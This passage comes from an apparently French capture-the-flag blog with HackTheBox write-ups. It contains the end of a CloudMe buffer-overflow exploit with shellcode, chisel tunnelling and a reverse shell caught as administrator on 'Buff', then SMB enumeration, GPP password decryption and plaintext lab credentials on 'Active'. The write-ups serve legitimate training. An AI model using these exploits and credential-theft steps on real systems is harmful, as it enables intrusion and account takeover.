class="s2">&#34;\xa9\x45\x98\x4c\x19\x31\x1b\x84\x53\xba\xb0\xe9&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x5b\x49\xc8\x2e\x5b\xb2\xbf\x46\x9f\x4f\xb8\x9d&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xdd\x8b\x4d\x05\x45\x5f\xf5\xe1\x77\x8c\x60\x62&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x7b\x79\xe6\x2c\x98\x7c\x2b\x47\xa4\xf5\xca\x87&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2c\x4d\xe9\x03\x74\x15\x90\x12\xd0\xf8\xad\x44&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbb\xa5\x0b\x0f\x56\xb1\x21\x52\x3f\x76\x08\x6c&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbf\x10\x1b\x1f\x8d\xbf\xb7\xb7\xbd\x48\x1e\x40&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xc1\x62\xe6\xde\x3c\x8d\x17\xf7\xfa\xd9\x47\x6f&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2a\x62\x0c\x6f\xd3\xb7\x83\x3f\x7b\x68\x64\xef&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x3b\xd8\x0c\xe5\xb3\x07\x2c\x06\x1e\x20\xc7\xfd&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xc9\x45\x12\xf3\x23\x32\x20\x0b\x17\xeb\xad\xed&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x3d\xfb\xfb\xa6\xa9\x62\xa6\x3c\x4b\x6a\x7c\x39&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x4b\xe0\x73\xbe\x02\x01\xf9\xac\xf3\xe1\xb4\x8e&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x52\xfd\x62\xa6\x39\x6c\xe9\x36\x37\x8d\xa6\x61&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x10\x63\xbf\xe7\x8c\xda\x69\x15\x4d\xba\x52\x9d&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x8a\x7f\x5c\x1c\x5e\x3b\x7a\x0e\xa6\xc4\xc6\x7a&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x76\x93\x90\xd4\x30\x4d\x53\x8e\xea\x22\x3d\x46&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x6a\x09\xfe\x10\x73\x44\x88\xfc\xc2\x31\xcd\x03&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xea\xd5\xd9\x7c\x16\x46\x25\x57\x92\x76\x6c\xf5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xb3\x1e\x29\x6c\x86\x42\xca\x5b\xc5\x7a\x49\x69&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xb6\x78\x51\x18\xb3\xc5\xd5\xf1\xc9\x56\xb0\xf5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x7e\x56\x91&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">payload</span> <span class="o">=</span> buf </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">overrun</span> <span class="o">=</span> b<span class="s2">&#34;C&#34;</span> * <span class="o">(</span><span class="m">1500</span> - len<span class="o">(</span>padding1 + NOPS + EIP + payload<span class="o">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">=</span> padding1 + EIP + NOPS + payload + overrun </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">try: </span></span><span class="line"><span class="cl"> <span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET, socket.SOCK_STREAM<span class="o">)</span> </span></span><span class="line"><span class="cl"> s.connect<span class="o">((</span>target,8888<span class="o">))</span> </span></span><span class="line"><span class="cl"> s.send<span class="o">(</span>buf<span class="o">)</span> </span></span><span class="line"><span class="cl">except Exception as e: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>sys.exc_value<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="chisel---port-forwarding-8888">Chisel - port forwarding (8888) </h3><p>Mise en place de chisel, pour dupliquer le port 8888 de la machine cible sur la machine locale. EN effet, ce port n&rsquo;est accessible que depuis la machine cible normalement : Or, pour exploiter notre vuln, avec le script python , il faut que le port soit accessible sur notre machine local qui dispose bien de python.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kali@kali:~/htb/Buff$ ./chisel server -p <span class="m">1082</span> --reverse </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Fingerprint iiSKQuGUrbyvUjt5afbcmjecM6T6JHMCaV2+4LBLk3g<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Listening on http://0.0.0.0:1082 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/01/10 20:19:07 server: session#1: tun: proxy#R:8888<span class="o">=</span>&gt;localhost:8888: Listening </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="c1"># Windows target</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; .<span class="se">\c</span>hisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 </span></span><span class="line"><span class="cl">.<span class="se">\c</span>hisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 </span></span><span class="line"><span class="cl">2025/01/11 01:19:06 client: Connecting to ws://10.10.14.42:1082 </span></span><span class="line"><span class="cl">2025/01/11 01:19:07 client: Connected <span class="o">(</span>Latency 22.8931ms<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploitation-roottxt">Exploitation (root.txt) </h3><p>Enfin, on execute l&rsquo;exploit final et on obtient un shell en tant que root sur la machine windows :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">9001</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.198<span class="o">]</span> <span class="m">49685</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17134.1610<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;cd ../../Users/Administrator/Desktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> ../../Users/Administrator/Desktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;cat root.txt </span></span><span class="line"><span class="cl">cat root.txt </span></span><span class="line"><span class="cl"><span class="s1">&#39;cat&#39;</span> is not recognized as an internal or external command, </span></span><span class="line"><span class="cl">operable program or batch file. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">39c4....c39f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;powershell </span></span><span class="line"><span class="cl">powershell </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\a</span>dministrator </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/active-htb/Sun, 05 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/active-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Active cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Active</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.100</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SVC_TGS : GPPstillStandingStrong2k18 </span></span><span class="line"><span class="cl">Administrator : Ticketmaster1968 </span></span></code></pre></td></tr></table> </div> </div><h2 id="version">Version </h2><p><code>Windows Server 2008 R2 SP1</code></p> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -sC -sV -An -p- 10.10.10.100 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-12 17:12 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.10.100 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.027s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">65512</span> closed tcp ports <span class="o">(</span>reset<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">53/tcp open domain Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> <span class="o">(</span>Windows Server <span class="m">2008</span> R2 SP1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> dns-nsid: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ bind.version: Microsoft DNS 6.1.7601 <span class="o">(</span>1DB15D39<span class="o">)</span> </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-12-12 22:12:47Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: active.htb, Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: active.htb, Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped </span></span><span class="line"><span class="cl">5722/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf .NET Message Framing </span></span><span class="line"><span class="cl">47001/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">49152/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49153/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49154/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49155/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49158/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49165/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49166/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49168/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 2:1:0: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-12T22:13:57 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: 2024-12-12T22:09:06 </span></span></code></pre></td></tr></table> </div> </div><h3 id="enu4mlinux">enu4mlinux </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Got OS info <span class="k">for</span> 10.10.10.100 from srvinfo: </span></span><span class="line"><span class="cl"> 10.10.10.100 Wk Sv PDC Tim NT Domain Controller </span></span><span class="line"><span class="cl"> platform_id : <span class="m">500</span> </span></span><span class="line"><span class="cl"> os version : 6.1 </span></span><span class="line"><span class="cl"> server <span class="nb">type</span> : <span class="nv">0x80102b</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=================================(</span> Share Enumeration on 10.10.10.100 <span class="o">)=================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.10.100 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> Replication Disk </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span><span class="line"><span class="cl"> Users Disk </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Attempting to map shares on 10.10.10.100 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-share-replication">SMB Share &ldquo;Replication&rdquo; </h3><p>En fouillant le SMB share &ldquo;replication&rdquo; accessible avec un utilisateur anonyme, on trouve un fichier intéressant parmis les autres:</p> <ul> <li>Groups.xml</li> </ul> <p>Il semble contenir un mot de passe chiffré.</p> <p><strong>Explication de ChatGPT</strong> :</p> <p>Le mot de passe chiffré dans le champ cpassword que vous montrez est très probablement encodé en AES-256-CBC et fait partie d&rsquo;une configuration XML de stratégie de groupe Windows (Group Policy Preferences, ou GPP). Ces cpassword sont généralement liés à des configurations de comptes d&rsquo;utilisateurs déployés via les GPP.</p> <h3 id="gpp-exploitation">GPP Exploitation </h3><p>On déchiffre le mot de passe, ce qui nous donne : <code>GPPstillStandingStrong2k18</code> Le username associé est également donné dans le xml : <code>SVC_TGS</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient --no-pass //10.10.10.100/Replication </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat Groups.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>?&gt; </span></span><span class="line"><span class="cl">&lt;Groups <span class="nv">clsid</span><span class="o">=</span><span class="s2">&#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}&#34;</span>&gt;&lt;User <span class="nv">clsid</span><span class="o">=</span><span class="s2">&#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&#34;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;active.htb\SVC_TGS&#34;</span> <span class="nv">image</span><span class="o">=</span><span class="s2">&#34;2&#34;</span> <span class="nv">changed</span><span class="o">=</span><span class="s2">&#34;2018-07-18 20:46:06&#34;</span> <span class="nv">uid</span><span class="o">=</span><span class="s2">&#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}&#34;</span>&gt;&lt;Properties <span class="nv">action</span><span class="o">=</span><span class="s2">&#34;U&#34;</span> <span class="nv">newName</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">fullName</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">description</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">cpassword</span><span class="o">=</span><span class="s2">&#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&#34;</span> <span class="nv">changeLogon</span><span class="o">=</span><span class="s2">&#34;0&#34;</span> <span class="nv">noChange</span><span class="o">=</span><span class="s2">&#34;1&#34;</span> <span class="nv">neverExpires</span><span class="o">=</span><span class="s2">&#34;1&#34;</span> <span class="nv">acctDisabled</span><span class="o">=</span><span class="s2">&#34;0&#34;</span> <span class="nv">userName</span><span class="o">=</span><span class="s2">&#34;active.htb\SVC_TGS&#34;</span>/&gt;&lt;/User&gt; </span></span><span class="line"><span class="cl">&lt;/Groups&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ gpp-decrypt <span class="s2">&#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&#34;</span> </span></span><span class="line"><span class="cl">GPPstillStandingStrong2k18 </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag---smb-share-users">user flag - SMB Share Users </h3><p>En scannat a nouveau les shares SMB, cette fois-ci avec notre user/password obtenu, on voit qu&rsquo;on a acces au share &ldquo;Users&rdquo; en readonly. On y trouve un dossier avec le nom de notre utilisateur et tous ces fichiers Windows, avec le flag user.txt :</p> <blockquote> <p>1fc4&hellip;..a676</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound1<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ smbclient //10.10.10.100/Users -U <span class="s1">&#39;SVC_TGS%GPPstillStandingStrong2k18&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Sat Jul <span class="m">21</span> 10:39:20 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Sat Jul <span class="m">21</span> 10:39:20 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Administrator D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> All Users DHSrn <span class="m">0</span> Tue Jul <span class="m">14</span> 01:06:44 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Default DHR <span class="m">0</span> Tue Jul <span class="m">14</span> 02:38:21 <span class="m">2009</span> </span></span><span class="line"><span class="cl"> Default User DHSrn <span class="m">0</span> Tue Jul <span class="m">14</span> 